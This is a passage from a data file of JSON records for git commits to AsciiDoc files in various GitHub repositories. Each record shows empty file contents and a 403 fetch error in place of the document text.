2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7af43fbf5145c17e5e0f601c84e2e65367361a05","subject":"added jeeconf link","message":"added jeeconf link\n","repos":"tsypuk\/springrestdoc","old_file":"restdocs\/src\/docs\/asciidoc\/etc\/jeeconf.adoc","new_file":"restdocs\/src\/docs\/asciidoc\/etc\/jeeconf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b2dbbffac73f8452da2fe54ff4bdd85e5261f30","subject":"Update 2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","message":"Update 2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","new_file":"_posts\/2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"822b61f0765de45e743520d542644fc4f545e2c6","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764f5ed5689f6146a46cf9ff07283938a126725f","subject":"Update 2015-05-14-test.adoc","message":"Update 2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ff716e723a393c547284ae69bd21838a831fbbb","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac88e2cdb33d1768a75ffaf6363a321964251ee","subject":"y2b create post Unboxing LEGO Dimensions!","message":"y2b create post Unboxing LEGO Dimensions!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-04-Unboxing-LEGO-Dimensions.adoc","new_file":"_posts\/2015-10-04-Unboxing-LEGO-Dimensions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"898141f2b657741dd69a7f717a249c6f08fd3e7a","subject":"y2b create post Unboxing The Sony A7R II","message":"y2b create post Unboxing The Sony A7R II","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-23-Unboxing-The-Sony-A7R-II.adoc","new_file":"_posts\/2015-11-23-Unboxing-The-Sony-A7R-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd25053aced6198a15d3ce0bff211eb60d9fc64","subject":"WhoAmI","message":"WhoAmI\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"security.adoc","new_file":"security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d5cca0caf87efe37395e40478fb909c650e5fc9","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0284c89b628a17e788ee79b09103a980a0c4337f","subject":"Update 2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","message":"Update 2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","new_file":"_posts\/2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7296dc53d41c728ead4f493911d66172420117b4","subject":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-20-OnePlus-5T-Limited-Edition-Unboxing--Easter-Egg.adoc","new_file":"_posts\/2017-12-20-OnePlus-5T-Limited-Edition-Unboxing--Easter-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f248e475f72422530a625bc26405751a971b8b5","subject":"readme for lab 6","message":"readme for lab 6\n","repos":"toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial","old_file":"lab6\/initial\/README.adoc","new_file":"lab6\/initial\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/toedter\/webapp-tutorial.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db60bc81d3b359613306b9e7323f70cb1da9ad16","subject":"Update 2015-10-01-coffee_and_blackmoney.adoc","message":"Update 2015-10-01-coffee_and_blackmoney.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-01-coffee_and_blackmoney.adoc","new_file":"_posts\/2015-10-01-coffee_and_blackmoney.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f2a2de780ae230bd20cbe65f099ed8403f7eefd","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8c67b69577e1c00d08f009fd84844a34c1f59b","subject":"y2b create post Galaxy S7 - 16 Hours In Water","message":"y2b create post Galaxy S7 - 16 Hours In Water","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-01-Galaxy-S7--16-Hours-In-Water.adoc","new_file":"_posts\/2016-04-01-Galaxy-S7--16-Hours-In-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cd32a16eac19d4341dcc6b3980ae5b332553587","subject":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","message":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39e2307dde10a8e698f274c4b8e36ec03341aef","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f7f263e5f531cc4a220ea8c2c73eaddeeacab2b","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b77781cf3cc910842006d05260d3339fa8cd58d","subject":"Update 2019-01-31-Pwnablekr-UAF-Writeup.adoc","message":"Update 2019-01-31-Pwnablekr-UAF-Writeup.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2019-01-31-Pwnablekr-UAF-Writeup.adoc","new_file":"_posts\/2019-01-31-Pwnablekr-UAF-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f79c58685179a6a6dc3cdad9b189a582f38c01","subject":"Update 2016-11-07-180000-Monday-Workday.adoc","message":"Update 2016-11-07-180000-Monday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-180000-Monday-Workday.adoc","new_file":"_posts\/2016-11-07-180000-Monday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81857e4ee8cd939577671d7a438d12a2c9e66de","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddb9cfaf4b31740882ddce3e1671d9d5e050ac4a","subject":"Added wafle.io badge","message":"Added wafle.io badge\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c4e4f14ab64137fcdedad0e2b84876bf672854e","subject":"initial Readme","message":"initial Readme\n","repos":"tuxdevelop\/spring-cloud-demo,tuxdevelop\/spring-cloud-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-cloud-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d73e78f721bcad25976440dac83e6edd6825d36","subject":"Update 2015-10-17-El-Capitan-PostgreSQL.adoc","message":"Update 2015-10-17-El-Capitan-PostgreSQL.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-10-17-El-Capitan-PostgreSQL.adoc","new_file":"_posts\/2015-10-17-El-Capitan-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9845e5b442141ec3fed32b864114dd544b258f6","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aecba8da16d3dace29f789c6bf108615668744b1","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"371686dda5d368a5d1ac6e93cd02bdbb5b88a8d1","subject":"Update 2017-05-01-PlaidCTF-2017-Writeup.adoc","message":"Update 2017-05-01-PlaidCTF-2017-Writeup.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6d6416169d8726c6f9135084718154d716ff78","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60f92ffd0c66adc415bb79358dd384cbe7cd711","subject":"y2b create post 4K in your palm!","message":"y2b create post 4K in your palm!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-02-4K-in-your-palm.adoc","new_file":"_posts\/2015-02-02-4K-in-your-palm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"598aff258fdd7b0fcb92896d879baf83068c09f1","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d16ef39c92e7e28ca4d8bff9eb4d9f0ec5e4762f","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e6d55c15a0411c025f0b45ea8852064bfe8539","subject":"Update 2016-06-28-My-teaching-philosophy.adoc","message":"Update 2016-06-28-My-teaching-philosophy.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-My-teaching-philosophy.adoc","new_file":"_posts\/2016-06-28-My-teaching-philosophy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a924460f4cf9ad38bba6804267997941d49d0c45","subject":"Update 2015-11-01-Base-de-Conocimiento.adoc","message":"Update 2015-11-01-Base-de-Conocimiento.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Base-de-Conocimiento.adoc","new_file":"_posts\/2015-11-01-Base-de-Conocimiento.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82918d01ee36de717fdf0872c4d9105ece4fefda","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be234445079e7f0bc4231460451bbda3ebdbc4a6","subject":"Create do-automation-es.adoc","message":"Create do-automation-es.adoc\n\nSpanish translation for do-automation.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-automation-es.adoc","new_file":"src\/do\/do-automation-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147c869c0be2e515da62c4461cd5d964e9a8952d","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build revapi revapi_maven_utils revapi_basic_features revapi_java_spi revapi_ant_task revapi_java revapi_maven_plugin revapi_reporter_file_base revapi_standalone revapi_reporter_json revapi_reporter_text","message":"Adding release notes for release of revapi_parent revapi_build_support revapi_build revapi revapi_maven_utils revapi_basic_features revapi_java_spi revapi_ant_task revapi_java revapi_maven_plugin revapi_reporter_file_base revapi_standalone revapi_reporter_json revapi_reporter_text\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200724-reporting-improvements.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200724-reporting-improvements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"043a3e612c91f6e7f97ee25fcdc31b6389957b75","subject":"Added Spring documentation.","message":"Added Spring documentation.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_spring.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c42dbff193280d57f3b72cc8b7cb5092e946eff","subject":"add notes for references of import statements","message":"add notes for references of import statements\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"web.adoc","new_file":"web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afdb769c5abe824f3f3bda223d7773ae8dc20d09","subject":"Update 2016-04-04-Ha.adoc","message":"Update 2016-04-04-Ha.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Ha.adoc","new_file":"_posts\/2016-04-04-Ha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bf2386bdf0f0a4aa5dc30679728e5e2a7f0af44","subject":"Add PBR article part three","message":"Add PBR article part three","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part3.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8a76f52a8a112e1c4f3830b4192bca95198d9182","subject":"Update 2019-01-18-Farewell-Red-Hat-friends.adoc","message":"Update 2019-01-18-Farewell-Red-Hat-friends.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2019-01-18-Farewell-Red-Hat-friends.adoc","new_file":"_posts\/2019-01-18-Farewell-Red-Hat-friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5fd3e855a59452524eb5cafd6894da89f0fe901","subject":"Update 2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","message":"Update 2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","new_file":"_posts\/2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8246cb717e8914acb67bfd85edbdc04c8e98413d","subject":"Update 2015-02-18-Lets-Chat-on-Ubuntu.adoc","message":"Update 2015-02-18-Lets-Chat-on-Ubuntu.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-18-Lets-Chat-on-Ubuntu.adoc","new_file":"_posts\/2015-02-18-Lets-Chat-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea20feb4a432561dcb6173316d77527b93c4e09d","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2bd3cdc83fed2297b43f7756ccdb4db0825456d","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2413d2068f732353184e4fa378f8f20eb56886b","subject":"[Docs] Fix broken external links in HLRC Rollup documentation","message":"[Docs] Fix broken external links in HLRC Rollup documentation\n\nAnother 